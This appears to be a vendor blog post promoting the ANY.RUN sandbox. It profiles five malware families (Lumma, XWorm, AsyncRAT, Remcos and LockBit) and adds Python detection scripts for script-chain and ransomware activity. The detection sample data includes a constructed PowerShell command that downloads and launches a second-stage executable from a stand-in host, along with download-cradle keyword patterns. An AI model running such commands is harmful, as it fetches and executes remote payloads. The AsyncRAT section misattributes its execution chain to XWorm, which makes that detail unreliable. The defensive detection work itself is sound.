2024 had its fair share of high-profile cyber attacks, with companies as big as Dell and Ticketmaster falling victim to data breaches and other infrastructure compromises. In 2025, this trend will continue. So, to be prepared for any kind of malware attack, every organization needs to know its cyber enemy in advance. Here are 5 common malware families that you can start preparing to counter right now.
Lumma is a widely available malware designed to steal sensitive information. It has been openly sold on the Dark Web since 2022. This malware can effectively collect and exfiltrate data from targeted applications, including login credentials, financial information, and personal details.
Lumma is regularly updated to enhance its capabilities. It can log detailed information from compromised systems, such as browsing history and cryptocurrency wallet data. It can be used to install other malicious software on infected devices. In 2024, Lumma was distributed through various methods, including fake CAPTCHA pages, torrents, and targeted phishing emails.
Proactive analysis of suspicious files and URLs within a sandbox environment can effectively help you prevent Lumma infection.
Let’s see how you can do it using ANY.RUN’s cloud-based sandbox. It not only delivers definitive verdicts on malware and phishing along with actionable indicators but also allows real-time interaction with the threat and the system.
Take a look at this analysis of a Lumma attack.
It starts with an archive which contains an executable. Once we launch the .exe file, the sandbox automatically logs all processes and network activities, showing Lumma’s actions.
It connects to its command-and-control (C2) server.
Next, it begins to collect and exfiltrate data from the machine.
After finishing the analysis, we can export a report on this sample, featuring all the important indicators of compromise (IOCs) and TTPs that can be used to enrich defenses against possible Lumma attacks in your organization.
XWorm is a malicious program that gives cybercriminals remote control over infected computers. First appearing in July 2022, it can collect a wide range of sensitive information, including financial details, browsing history, saved passwords, and cryptocurrency wallet data.
XWorm allows attackers to monitor victims’ activities by tracking keystrokes, capturing webcam images, listening to audio input, scanning network connections, and viewing open windows. It can also access and manipulate the computer’s clipboard, potentially stealing cryptocurrency wallet credentials.
In 2024, XWorm was involved in many large-scale attacks, including ones that exploited Cloudflare tunnels and legitimate digital certificates.
In this attack, we can see the original phishing email, which features a link to a Google Drive file.
Once we follow the link, we are prompted to download an archive which is protected with a password.
The password can be found in the email. After entering it, we can access a .vbs script inside the .zip file.
As soon as we launch the script, the sandbox instantly detects malicious activities, which eventually lead to the deployment of XWorm on the machine.
AsyncRAT is another remote access trojan on the list. First seen in 2019, it was initially spread through spam emails, often exploiting the COVID-19 pandemic as a lure. Since then, the malware has gained popularity and been used in various cyber attacks.
AsyncRAT has evolved over time to include a wide range of malicious capabilities. It can secretly record a victim’s screen activity, log keystrokes, install additional malware, steal files, maintain a persistent presence on infected systems, disable security software, and launch attacks that overwhelm targeted websites.
In 2024, AsyncRAT remained a significant threat, often disguised as pirated software. It was also one of the first malware families to be distributed as part of complex attacks involving scripts generated by AI.
In this analysis session, we can see another archive with a malicious executable inside.
Detonating the file kicks off the execution chain of XWorm, which involves the use of PowerShell scripts to fetch additional files needed to facilitate the infection.
Once the analysis is finished, the sandbox displays the final verdict on the sample.
Remcos is malware that has been marketed by its creators as a legitimate remote access tool. Since its launch in 2019, it has been used in numerous attacks to perform a wide range of malicious activities, including stealing sensitive information, remotely controlling the system, recording keystrokes, capturing screen activity, etc.
In 2024, campaigns to distribute Remcos used techniques like script-based attacks, which often start with a VBScript that launches a PowerShell script to deploy the malware, and exploited vulnerabilities like CVE-2017-11882 by leveraging malicious XML files.
In this example, we are met with another phishing email that features a .zip attachment and a password for it.
The final payload leverages Command Prompt and Windows system processes to load and execute Remcos.
The ANY.RUN sandbox maps the entire chain of attack to the MITRE ATT&CK matrix for convenience.
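The script chain seen in the XWorm, AsyncRAT and Remcos sessions above (a VBScript launching PowerShell, PowerShell fetching further files, cmd.exe starting the payload) can be flagged from process-creation telemetry by walking each shell's ancestry. This is an added detection example, not code from the article or from ANY.RUN; the events, pids, paths and URL are constructed.

```python
"""Flag the VBScript -> PowerShell -> cmd.exe script chain in process-creation events.

Constructed events only; the paths, pids and URL below are made up for illustration.
"""
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Command-line fragments that suggest the shell is fetching a second stage
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "invoke-webrequest", "iwr ", "bitsadmin")

# Constructed process-creation events: (pid, parent pid, image name, command line)
SAMPLE_EVENTS = [
    (100, 1, "explorer.exe", "explorer.exe"),
    (200, 100, "wscript.exe", 'wscript.exe "C:\\Users\\victim\\Downloads\\invoice.vbs"'),
    (300, 200, "powershell.exe",
     'powershell.exe -w hidden -c "Invoke-WebRequest http://example.invalid/stage2 '
     '-OutFile C:\\Users\\victim\\AppData\\Local\\Temp\\s.exe"'),
    (400, 300, "cmd.exe", "cmd.exe /c start C:\\Users\\victim\\AppData\\Local\\Temp\\s.exe"),
    # Benign: an admin-run script launched straight from the desktop shell
    (500, 100, "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),
]


def ancestry(pid, procs, max_depth=16):
    """Return [image, parent image, grandparent image, ...] for pid."""
    chain = []
    while pid in procs and len(chain) < max_depth:  # max_depth guards against pid-reuse loops
        ppid, image, _ = procs[pid]
        chain.append(image)
        pid = ppid
    return chain


def find_script_chains(events):
    """Return (pid, 'root -> ... -> image', reason) for shells descended from a script host."""
    procs = {pid: (ppid, image.lower(), cmd) for pid, ppid, image, cmd in events}
    alerts = []
    for pid, (_, image, cmd) in procs.items():
        if image not in SHELLS:
            continue
        chain = ancestry(pid, procs)
        if not any(anc in SCRIPT_HOSTS for anc in chain[1:]):
            continue
        reason = "shell descended from a script host"
        if any(hint in cmd.lower() for hint in DOWNLOAD_HINTS):
            reason += " with a download cradle"
        alerts.append((pid, " -> ".join(reversed(chain)), reason))
    return alerts
```

The benign PowerShell process (pid 500) is not flagged because no script host appears above it in the tree, which is the distinction that keeps this rule quieter than alerting on every PowerShell launch.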
LockBit is ransomware primarily targeting Windows devices. It is considered one of the biggest ransomware threats, accounting for a substantial portion of all Ransomware-as-a-Service (RaaS) attacks. The decentralized nature of the LockBit group has allowed it to compromise numerous high-profile organizations worldwide, including the UK’s Royal Mail and India’s National Aerospace Laboratories (in 2024).
Law enforcement agencies have taken steps to combat the LockBit group, leading to the arrest of several developers and partners. Despite these efforts, the group continues to operate, with plans to release a new version, LockBit 4.0, in 2025.
Check out this sandbox session, showing how fast LockBit infects and encrypts files on a system.
By tracking file system changes, we can see it modified 300 files in less than a minute.
The malware also drops a ransom note, detailing the instructions for getting the data back.
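The file-system burst and ransom-note drop described in the LockBit session above can be turned into a detection over file-system events: count modifies and renames per process in a sliding one-minute window, and watch for a newly created note-like file. This is an added example, not part of the article or ANY.RUN's tooling; the events, pid, file names and the 100-files-per-minute threshold are constructed assumptions.

```python
"""Flag a process that modifies or renames many files within a short window and drops a note.

Constructed file-system events only; pids, paths and the threshold are assumptions.
"""
WINDOW_SECONDS = 60     # the article observes 300 files touched in under a minute
THRESHOLD = 100         # assumed alert threshold for modifies/renames per window per process
NOTE_HINTS = ("readme", "restore", "decrypt", "recover", "how_to")


def build_sample_events():
    """Constructed events: (time in seconds, pid, operation, path)."""
    events = [
        (0.5, 7, "modify", "C:\\Users\\victim\\notes.txt"),
        (20.0, 7, "create", "C:\\Users\\victim\\report.docx"),
    ]
    # One process renaming 300 documents over roughly 45 seconds
    events += [(10 + i * 0.15, 4242, "rename", f"C:\\Users\\victim\\Documents\\file{i}.docx.locked")
               for i in range(300)]
    events.append((55.0, 4242, "create", "C:\\Users\\victim\\Documents\\HOW_TO_RESTORE_FILES.txt"))
    return sorted(events)


def burst_pids(events, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return {pid: peak count} for processes whose modify/rename count in any window reaches threshold."""
    times_by_pid = {}
    for t, pid, op, _ in events:
        if op in ("modify", "rename"):
            times_by_pid.setdefault(pid, []).append(t)
    hits = {}
    for pid, times in times_by_pid.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):      # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            hits[pid] = peak
    return hits


def ransom_notes(events):
    """Return paths of newly created files whose name looks like a ransom note."""
    notes = []
    for _, _, op, path in events:
        name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
        if op == "create" and any(hint in name for hint in NOTE_HINTS):
            notes.append(path)
    return notes
```

Correlating the two signals (the same pid both bursting and creating the note) gives a higher-confidence alert than either one alone, since backup jobs and bulk renames can also trip the burst rule.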
Analyzing cyber threats proactively instead of reacting to them once they become a problem for your organization is the best course of action any business can take. Simplify it with ANY.RUN’s Interactive sandbox by examining all suspicious files and URLs inside a safe virtual environment that helps you identify malicious content with ease.
With the ANY.RUN sandbox, your company can:
Try all features of ANY.RUN with a 14-day free trial.